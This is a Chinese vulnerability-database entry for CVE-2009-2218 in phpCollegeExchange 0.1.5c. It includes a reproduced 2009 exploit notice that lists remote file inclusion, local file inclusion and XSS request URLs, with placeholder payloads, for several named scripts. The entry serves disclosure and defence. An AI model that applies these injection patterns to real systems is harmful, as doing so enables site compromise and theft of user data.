david_degner phpcollegeexchange 多个PHP代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118001 漏洞类型 代码注入
发布时间 2009-06-23 更新时间 2009-06-25
CVE编号 CVE-2009-2218 CNNVD-ID CNNVD-200906-407
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/9008
https://www.securityfocus.com/bid/79463
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-407
|漏洞详情
phpCollegeExchange0.1.5c版本中存在多个PHP远程文件包含漏洞,当register_globals被激活时,远程攻击者可以借助对(1)i_head.php,(2)i_nav.php,(3)user_new_2.php,or(4)house/myrents.php;或(5)allbooks.php,(6)ome.php,或(7)books/中的mybooks.php的home参数中的一个URL,执行任意PHP代码。
|漏洞EXP
????????????????????????????????????????????????????????????????????????????????????
??                                C r a C k E r                                   ??
??             T H E   C R A C K   O F   E T E R N A L   M I G H T                ??
????????????????????????????????????????????????????????????????????????????????????

 ?????         From The Ashes and Dust Rises An Unimaginable crack....         ?????
????????????????????????????????????????????????????????????????????????????????????
??         [ Remote File Include ]     [ Local File Include ]     [ XSS ]         ??
????????????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                   : :                                       :
?   Script   : phpCollegeExchange 0.1.5c ? ?          Register Globals :           ?
?   Download : sourceforge.net           ? ?                                       ?
?   Method   : GET                       ? ?           [?] ON   [ ] OFF            ?
?   Critical : High [????????]           ? ?                                       ?
?   Impact   : system information        ? ?                                       ?
? ???????????????????????????????????????? ??????????????????????????????????????? ?
?                                 DALnet #crackers                                ??
????????????????????????????????????????????????????????????????????????????????????
:                                                                                  :
?  Release Notes:                                                                  ?
?  ?????????????                                                                   ?
?  Typically used for remotely exploitable vulnerabilities that can lead to        ?
?  system compromise.                                                              ?
?                                                                                  ?

????????????????????????????????????????????????????????????????????????????????????
??                                Exploit URL's                                   ??
????????????????????????????????????????????????????????????????????????????????????

[RFI]

http://localhost/path/i_head.php?home=[SHELL]
http://localhost/path/i_nav.php?home=[SHELL]
http://localhost/path/user_new_2.php?home=[SHELL]
http://localhost/path/books/allbooks.php?home=[SHELL]
http://localhost/path/books/home.php?home=[SHELL]
http://localhost/path/books/mybooks.php?home=[SHELL]


[LFI]

http://localhost/path/house/myrents.php?home=[LFI]


[XSS]

http://localhost/php pages/home.php?_SESSION[handle]=[XSS]
http://localhost/path/i_head.php?home=[XSS]
http://localhost/path/i_nav.php?home=[XSS]
http://localhost/path/books/allbooks.php?home=[XSS]
http://localhost/path/books/allbooks.php?_SESSION[handle]=[XSS]
http://localhost/path/books/home.php?home=[XSS]
http://localhost/path/books/home.php?_SESSION[handle]=[XSS]
http://localhost/path/books/i_nav.php?home=[XSS]


   
????????????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL, rd0 .

????????????????????????????????????????????????????????????????????????????????????
??                                 © CraCkEr 2009                                 ??
????????????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2009-06-23]
|受影响的产品
David Degner Phpcollegeexchange 0.1.5C
|参考资料

来源:MILW0RM
名称:9008
链接:http://www.milw0rm.com/exploits/9008
来源:SECUNIA
名称:35452
链接:http://secunia.com/advisories/35452